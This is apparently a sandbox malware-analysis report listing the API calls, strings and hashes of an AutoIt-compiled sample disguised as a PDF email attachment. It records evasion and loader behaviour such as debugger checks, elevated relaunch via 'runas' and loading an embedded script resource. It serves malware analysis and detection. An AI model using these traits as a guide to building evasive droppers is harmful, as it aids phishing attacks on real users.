104286->104301 104291 78d078 104287->104291 104292 78d097 SetFocus 104287->104292 104289->104264 104311 75443a Shell_NotifyIconW _memset 104289->104311 104312 7b2d36 81 API calls _memset 104290->104312 104291->104289 104294 78d081 104291->104294 104292->104301 104293 75370c 104306 753114 DeleteObject DestroyWindow Mailbox 104293->104306 104308 761070 10 API calls Mailbox 104294->104308 104299 753764 104299->104301 104302 78d118 104303 75434a 68 API calls 104302->104303 104303->104304 104304->104264 104305->104293 104306->104301 104307->104299 104308->104301 104309->104274 104310->104289 104311->104302 104312->104299 104313->104304 104314->104284 104315 79416f 104319 7a5fe6 104315->104319 104317 79417a 104318 7a5fe6 85 API calls 104317->104318 104318->104317 104320 7a6020 104319->104320 104325 7a5ff3 104319->104325 104320->104317 104321 7a6022 104331 759328 84 API calls Mailbox 104321->104331 104322 7a6027 104324 759837 84 API calls 104322->104324 104326 7a602e 104324->104326 104325->104320 104325->104321 104325->104322 104328 7a601a 104325->104328 104327 757b2e 59 API calls 104326->104327 104327->104320 104330 7595a0 59 API calls _wcsstr 104328->104330 104330->104320 104331->104322 104332 75107d 104337 75708b 104332->104337 104334 75108c 104335 772d40 __cinit 67 API calls 104334->104335 104336 751096 104335->104336 104338 75709b __ftell_nolock 104337->104338 104339 757667 59 API calls 104338->104339 104340 757151 104339->104340 104341 754706 61 API calls 104340->104341 104342 75715a 104341->104342 104368 77050b 104342->104368 104345 757cab 59 API calls 104346 757173 104345->104346 104347 753f74 59 API calls 104346->104347 104348 757182 104347->104348 104349 757667 59 API calls 104348->104349 104350 75718b 104349->104350 104351 757d8c 59 API calls 104350->104351 104352 757194 RegOpenKeyExW 104351->104352 104353 78e8b1 RegQueryValueExW 104352->104353 104359 7571b6 Mailbox 104352->104359 104354 78e8ce 104353->104354 104355 78e943 RegCloseKey 104353->104355 104356 770db6 Mailbox 59 API calls 104354->104356 104355->104359 104366 78e955 _wcscat Mailbox __wsetenvp 104355->104366 104357 78e8e7 104356->104357 104358 75522e 59 API calls 104357->104358 104360 78e8f2 RegQueryValueExW 104358->104360 104359->104334 104361 78e90f 104360->104361 104363 78e929 104360->104363 104362 757bcc 59 API calls 104361->104362 104362->104363 104363->104355 104364 757de1 59 API calls 104364->104366 104365 753f74 59 API calls 104365->104366 104366->104359 104366->104364 104366->104365 104367 7579f2 59 API calls 104366->104367 104367->104366 104369 781940 __ftell_nolock 104368->104369 104370 770518 GetFullPathNameW 104369->104370 104371 77053a 104370->104371 104372 757bcc 59 API calls 104371->104372 104373 757165 104372->104373 104373->104345 104374 e84200 104388 e81e50 104374->104388 104376 e842c7 104391 e840f0 104376->104391 104394 e852f0 GetPEB 104388->104394 104390 e824db 104390->104376 104392 e840f9 Sleep 104391->104392 104393 e84107 104392->104393 104395 e8531a 104394->104395 104395->104390 104396 75e4a8 104399 75d100 104396->104399 104398 75e4b6 104400 75d11d 104399->104400 104429 75d37d 104399->104429 104401 792691 104400->104401 104402 7926e0 104400->104402 104421 75d144 104400->104421 104405 792694 104401->104405 104412 7926af 104401->104412 104443 7ca3e6 341 API calls __cinit 104402->104443 104406 7926a0 104405->104406 104405->104421 104441 7ca9fa 341 API calls 104406->104441 104408 772d40 __cinit 67 API calls 104408->104421 104410 7928b5 104410->104410 104411 75d54b 104411->104398 104412->104429 104442 7caea2 341 API calls 3 library calls 104412->104442 104413 75d434 104435 758a52 68 API calls 104413->104435 104417 75d443 104417->104398 104418 7927fc 104447 7ca751 89 API calls 104418->104447 104421->104408 104421->104411 104421->104413 104421->104418 104423 7584c0 69 API calls 104421->104423 104421->104429 104430 759ea0 341 API calls 104421->104430 104431 758047 59 API calls 104421->104431 104433 758740 68 API calls __cinit 104421->104433 104434 758542 68 API calls 104421->104434 104436 75843a 68 API calls 104421->104436 104437 75cf7c 341 API calls 104421->104437 104438 759dda 59 API calls Mailbox 104421->104438 104439 75cf00 89 API calls 104421->104439 104440 75cd7d 341 API calls 104421->104440 104444 758a52 68 API calls 104421->104444 104445 759d3c 60 API calls Mailbox 104421->104445 104446 7a678d 60 API calls 104421->104446 104423->104421 104429->104411 104448 7b9e4a 89 API calls 4 library calls 104429->104448 104430->104421 104431->104421 104433->104421 104434->104421 104435->104417 104436->104421 104437->104421 104438->104421 104439->104421 104440->104421 104441->104411 104442->104429 104443->104421 104444->104421 104445->104421 104446->104421 104447->104429 104448->104410 104449 78fe27 104462 76f944 104449->104462 104451 78fe3d 104452 78febe 104451->104452 104453 78fe53 104451->104453 104458 75fce0 341 API calls 104452->104458 104471 759e5d 60 API calls 104453->104471 104455 78fe92 104456 78fe9a 104455->104456 104457 79089c 104455->104457 104472 7b834f 59 API calls Mailbox 104456->104472 104473 7b9e4a 89 API calls 4 library calls 104457->104473 104461 78feb2 Mailbox 104458->104461 104461->104461 104463 76f962 104462->104463 104464 76f950 104462->104464 104466 76f991 104463->104466 104467 76f968 104463->104467 104474 759d3c 60 API calls Mailbox 104464->104474 104475 759d3c 60 API calls Mailbox 104466->104475 104469 770db6 Mailbox 59 API calls 104467->104469 104470 76f95a 104469->104470 104470->104451 104471->104455 104472->104461 104473->104461 104474->104470 104475->104470

                                                                                                          Executed Functions

                                                                                                          Function 00753B3A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 153windowCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B68
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00753B7A
                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,,008152E0,?,?), ref: 00753BEB
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                            • Part of subcall function 0076092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00753C14,,?,?,?), ref: 0076096E
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00753C6F
                                                                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00807770,00000010), ref: 0078D281
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,,?,?,?), ref: 0078D2B9
                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00804260,,?,?,?), ref: 0078D33F
                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 0078D346
                                                                                                            • Part of subcall function 00753A46: GetSysColorBrush.USER32(0000000F), ref: 00753A50
                                                                                                            • Part of subcall function 00753A46: LoadCursorW.USER32(00000000,00007F00), ref: 00753A5F
                                                                                                            • Part of subcall function 00753A46: LoadIconW.USER32(00000063), ref: 00753A76
                                                                                                            • Part of subcall function 00753A46: LoadIconW.USER32(000000A4), ref: 00753A88
                                                                                                            • Part of subcall function 00753A46: LoadIconW.USER32(000000A2), ref: 00753A9A
                                                                                                            • Part of subcall function 00753A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AC0
                                                                                                            • Part of subcall function 00753A46: RegisterClassExW.USER32(?), ref: 00753B16
                                                                                                            • Part of subcall function 007539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A03
                                                                                                            • Part of subcall function 007539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A24
                                                                                                            • Part of subcall function 007539D5: ShowWindow.USER32(00000000,?,?), ref: 00753A38
                                                                                                            • Part of subcall function 007539D5: ShowWindow.USER32(00000000,?,?), ref: 00753A41
                                                                                                            • Part of subcall function 0075434A: _memset.LIBCMT ref: 00754370
                                                                                                            • Part of subcall function 0075434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00754415
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                          • String ID: This is a third-party compiled AutoIt script.$runas$%~$
                                                                                                          • API String ID: 529118366-2481735577
                                                                                                          • Opcode ID: 8e8372ef758587441ff450a6152ee0568e5638199dd4b91dc3ee56c776a7970c
                                                                                                          • Instruction ID: f47e2c26d842580c4bb7e49ad80595d641971a7c68ef8ee02a7a0fb0a966b05b
                                                                                                          • Opcode Fuzzy Hash: 8e8372ef758587441ff450a6152ee0568e5638199dd4b91dc3ee56c776a7970c
                                                                                                          • Instruction Fuzzy Hash: 1F51D571D08248EADB11EBB4EC09DED7B7DFF85752F008065F852A21A1DAFC5A49CB21
                                                                                                          Function 007549A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 998 7549a0-754a00 call 757667 GetVersionExW call 757bcc 1003 754a06 998->1003 1004 754b0b-754b0d 998->1004 1006 754a09-754a0e 1003->1006 1005 78d767-78d773 1004->1005 1007 78d774-78d778 1005->1007 1008 754a14 1006->1008 1009 754b12-754b13 1006->1009 1011 78d77a 1007->1011 1012 78d77b-78d787 1007->1012 1010 754a15-754a4c call 757d2c call 757726 1008->1010 1009->1010 1020 754a52-754a53 1010->1020 1021 78d864-78d867 1010->1021 1011->1012 1012->1007 1014 78d789-78d78e 1012->1014 1014->1006 1016 78d794-78d79b 1014->1016 1016->1005 1018 78d79d 1016->1018 1022 78d7a2-78d7a5 1018->1022 1020->1022 1023 754a59-754a64 1020->1023 1024 78d869 1021->1024 1025 78d880-78d884 1021->1025 1026 78d7ab-78d7c9 1022->1026 1027 754a93-754aaa GetCurrentProcess IsWow64Process 1022->1027 1028 78d7ea-78d7f0 1023->1028 1029 754a6a-754a6c 1023->1029 1030 78d86c 1024->1030 1032 78d86f-78d878 1025->1032 1033 78d886-78d88f 1025->1033 1026->1027 1031 78d7cf-78d7d5 1026->1031 1034 754aac 1027->1034 1035 754aaf-754ac0 1027->1035 1040 78d7fa-78d800 1028->1040 1041 78d7f2-78d7f5 1028->1041 1036 754a72-754a75 1029->1036 1037 78d805-78d811 1029->1037 1030->1032 1038 78d7df-78d7e5 1031->1038 1039 78d7d7-78d7da 1031->1039 1032->1025 1033->1030 1042 78d891-78d894 1033->1042 1034->1035 1043 754ac2-754ad2 call 754b37 1035->1043 1044 754b2b-754b35 GetSystemInfo 1035->1044 1045 78d831-78d834 1036->1045 1046 754a7b-754a8a 1036->1046 1048 78d81b-78d821 1037->1048 1049 78d813-78d816 1037->1049 1038->1027 1039->1027 1040->1027 1041->1027 1042->1032 1055 754ad4-754ae1 call 754b37 1043->1055 1056 754b1f-754b29 GetSystemInfo 1043->1056 1047 754af8-754b08 1044->1047 1045->1027 1054 78d83a-78d84f 1045->1054 1051 754a90 1046->1051 1052 78d826-78d82c 1046->1052 1048->1027 1049->1027 1051->1027 1052->1027 1057 78d859-78d85f 1054->1057 1058 78d851-78d854 1054->1058 1063 754ae3-754ae7 GetNativeSystemInfo 1055->1063 1064 754b18-754b1d 1055->1064 1059 754ae9-754aed 1056->1059 1057->1027 1058->1027 1059->1047 1061 754aef-754af2 FreeLibrary 1059->1061 1061->1047 1063->1059 1064->1063
                                                                                                          APIs
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 007549CD
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          • GetCurrentProcess.KERNEL32(?,007DFAEC,00000000,00000000,?), ref: 00754A9A
                                                                                                          • IsWow64Process.KERNEL32(00000000), ref: 00754AA1
                                                                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00754AE7
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00754AF2
                                                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00754B23
                                                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00754B2F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1986165174-0
                                                                                                          • Opcode ID: 993f1d5d96818aa055d88cdca0ea02b6c152493e94f2942c98bbb3ea4f546b33
                                                                                                          • Instruction ID: ae85f07cc8fd49c967188070865a76412e0b3df1da3004ab9484de79c06baa47
                                                                                                          • Opcode Fuzzy Hash: 993f1d5d96818aa055d88cdca0ea02b6c152493e94f2942c98bbb3ea4f546b33
                                                                                                          • Instruction Fuzzy Hash: 2791063198A7C0DEC731DB7898541EAFFF5AF2A305B04896ED4C783A41D268A94CC75D
                                                                                                          Function 00754E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1065 754e89-754ea1 CreateStreamOnHGlobal 1066 754ec1-754ec6 1065->1066 1067 754ea3-754eba FindResourceExW 1065->1067 1068 754ec0 1067->1068 1069 78d933-78d942 LoadResource 1067->1069 1068->1066 1069->1068 1070 78d948-78d956 SizeofResource 1069->1070 1070->1068 1071 78d95c-78d967 LockResource 1070->1071 1071->1068 1072 78d96d-78d98b 1071->1072 1072->1068
                                                                                                          APIs
                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00754D8E,?,?,00000000,00000000), ref: 00754E99
                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00754D8E,?,?,00000000,00000000), ref: 00754EB0
                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00754D8E,?,?,00000000,00000000,?,?,?,?,?,?,00754E2F), ref: 0078D937
                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00754D8E,?,?,00000000,00000000,?,?,?,?,?,?,00754E2F), ref: 0078D94C
                                                                                                          • LockResource.KERNEL32(00754D8E,?,?,00754D8E,?,?,00000000,00000000,?,?,?,?,?,?,00754E2F,00000000), ref: 0078D95F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                          • String ID: SCRIPT
                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                          • Opcode ID: 8c940dc497a1adb850cdcf0f83a69db0322c0d9198bd4447b9647b75b33e4e65
                                                                                                          • Instruction ID: 98ae7aa3020d190504f46e1b52f2bf122a09cdf90208da68d879621ad2405606
                                                                                                          • Opcode Fuzzy Hash: 8c940dc497a1adb850cdcf0f83a69db0322c0d9198bd4447b9647b75b33e4e65
                                                                                                          • Instruction Fuzzy Hash: D7115E75240700BFD7218B65EC49F6B7BBAFBC5B15F14826DF806C6250DBA5EC448A60
                                                                                                          Function 0075FCE0 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1040COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper
                                                                                                          • String ID: %~
                                                                                                          • API String ID: 3964851224-3145668672
                                                                                                          • Opcode ID: 0b65f46bee12efa2b87864da11568cd98d996a23b704e8aac913ef494a096d24
                                                                                                          • Instruction ID: 2c1efe3c65ddc199f0b5ab956cd21ac19bcd055d7297f667a524422cea61ff52
                                                                                                          • Opcode Fuzzy Hash: 0b65f46bee12efa2b87864da11568cd98d996a23b704e8aac913ef494a096d24
                                                                                                          • Instruction Fuzzy Hash: 9A924570608341DFDB24DF24C484B6BB7E1BF85304F14896DE98A9B262D779EC49CB92
                                                                                                          Function 007547D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsThemeActive.UXTHEME ref: 00754834
                                                                                                            • Part of subcall function 0077336C: __lock.LIBCMT ref: 00773372
                                                                                                            • Part of subcall function 0077336C: DecodePointer.KERNEL32(00000001,?,00754849,007A7C74), ref: 0077337E
                                                                                                            • Part of subcall function 0077336C: EncodePointer.KERNEL32(?,?,00754849,007A7C74), ref: 00773389
                                                                                                            • Part of subcall function 007548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00754915
                                                                                                            • Part of subcall function 007548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0075492A
                                                                                                            • Part of subcall function 00753B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B68
                                                                                                            • Part of subcall function 00753B3A: IsDebuggerPresent.KERNEL32 ref: 00753B7A
                                                                                                            • Part of subcall function 00753B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,,008152E0,?,?), ref: 00753BEB
                                                                                                            • Part of subcall function 00753B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00753C6F
                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00754874
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                          • String ID: Pm
                                                                                                          • API String ID: 1438897964-1129250259
                                                                                                          • Opcode ID: 81eb190ccfc3e2d555e36cdc4d53f67cb120e9596f44cfe89b943f6eeaa3fe9f
                                                                                                          • Instruction ID: f024c656985d30b36c6ad46a0a2cc864dafdaad3c7363f8fbd49120889922ed7
                                                                                                          • Opcode Fuzzy Hash: 81eb190ccfc3e2d555e36cdc4d53f67cb120e9596f44cfe89b943f6eeaa3fe9f
                                                                                                          • Instruction Fuzzy Hash: 52119071904301DBC700DF68EC0998ABBE8FF95750F10851EF48587271DBB4A549CB95
                                                                                                          Function 007B445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?,0078E398), ref: 007B446A
                                                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 007B447B
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007B448B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 48322524-0
                                                                                                          • Opcode ID: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
                                                                                                          • Instruction ID: 411dbf5925aa2e679e2abb5e3f050c08e6b1e31423803b231e3ec25069df7da1
                                                                                                          • Opcode Fuzzy Hash: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
                                                                                                          • Instruction Fuzzy Hash: E9E020334115406B42106B38EC0D9ED776CAF05335F104717F836D10D0E77C6D1095D9
                                                                                                          Function 0075E6A0 Relevance: 3.6, Strings: 2, Instructions: 1102COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HY$Variable must be of type 'Object'.
                                                                                                          • API String ID: 0-2698997645
                                                                                                          • Opcode ID: b8571357abff8900a864d377df01803780e78343bab08063f7501e4f780f16d3
                                                                                                          • Instruction ID: 9e949e8399a839dbc40cd786b4638bf790c44c986d40256c77ec46899142c121
                                                                                                          • Opcode Fuzzy Hash: b8571357abff8900a864d377df01803780e78343bab08063f7501e4f780f16d3
                                                                                                          • Instruction Fuzzy Hash: 80A28C75A00205CFCB28CF54C484AEAB7B2FF58311F248059ED55AB351D7B9EE4ACB91
                                                                                                          Function 007609D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760A5B
                                                                                                          • timeGetTime.WINMM ref: 00760D16
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760E53
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00760E61
                                                                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00760EFA
                                                                                                          • DestroyWindow.USER32 ref: 00760F06
                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00760F20
                                                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00794E83
                                                                                                          • TranslateMessage.USER32(?), ref: 00795C60
                                                                                                          • DispatchMessageW.USER32(?), ref: 00795C6E
                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00795C82
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                          • API String ID: 4212290369-3242690629
                                                                                                          • Opcode ID: d26e68bbb2a8d998c9db105411e5023794332e72bc536e1eec0bff61d3e1fe32
                                                                                                          • Instruction ID: ef3719a2d63e517964d39cbb3e78a825bee690531352112436f23a32e42331b2
                                                                                                          • Opcode Fuzzy Hash: d26e68bbb2a8d998c9db105411e5023794332e72bc536e1eec0bff61d3e1fe32
                                                                                                          • Instruction Fuzzy Hash: FBB2E470608741DFDB25DF24D888BABB7E4FF84304F14891DE98A972A1D779E844CB92
                                                                                                          Function 007B9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 007B8F5F: __time64.LIBCMT ref: 007B8F69
                                                                                                            • Part of subcall function 00754EE5: _fseek.LIBCMT ref: 00754EFD
                                                                                                          • __wsplitpath.LIBCMT ref: 007B9234
                                                                                                            • Part of subcall function 007740FB: __wsplitpath_helper.LIBCMT ref: 0077413B
                                                                                                          • _wcscpy.LIBCMT ref: 007B9247
                                                                                                          • _wcscat.LIBCMT ref: 007B925A
                                                                                                          • __wsplitpath.LIBCMT ref: 007B927F
                                                                                                          • _wcscat.LIBCMT ref: 007B9295
                                                                                                          • _wcscat.LIBCMT ref: 007B92A8
                                                                                                            • Part of subcall function 007B8FA5: _memmove.LIBCMT ref: 007B8FDE
                                                                                                            • Part of subcall function 007B8FA5: _memmove.LIBCMT ref: 007B8FED
                                                                                                          • _wcscmp.LIBCMT ref: 007B91EF
                                                                                                            • Part of subcall function 007B9734: _wcscmp.LIBCMT ref: 007B9824
                                                                                                            • Part of subcall function 007B9734: _wcscmp.LIBCMT ref: 007B9837
